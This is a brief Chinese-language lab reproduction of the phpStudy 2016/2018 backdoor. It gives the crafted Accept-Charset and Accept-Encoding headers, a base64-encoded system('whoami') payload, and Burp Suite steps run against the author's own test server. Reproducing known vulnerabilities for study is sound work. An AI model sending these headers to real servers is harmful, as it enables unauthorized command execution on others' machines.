phpstudy_2016-2018_rce_backdoor复现
漏洞描述
-
攻击者可以利用该漏洞执行PHP 命令,也可以称作phpStudy 后门。
-
RCE,Remote Command| Code Execute。
影响版本
- phpStudy 2016
- phpStudy 2018
利用代码
Accept-Charset: (命令的base64编码,例如system("whoami");进行编码)
Accept-Encoding: gzip,deflate #此处删除中间的空格
实现过程
- 此处使用的windows_server2016开启phpstudy,版本号为5.4.45
- 选择非服务模式
- 打开kali的burpsuite,选中proxy模块,选择打开浏览器
- 进入浏览器后访问php页面
-
点击HTTP history查看刚才的页面(有响应的),然后右键点击或者ctrl+r发送给repeater模块
-
将图中reque框选部分改为如图,随后发送即可执行命令
-
删除
delate
前空格,添加Accept-Charset:
信息 -
将所需执行命令base64编码
system("whoami"); to base64 c3lzdGVtKCJ3aG9hbWkiKTs=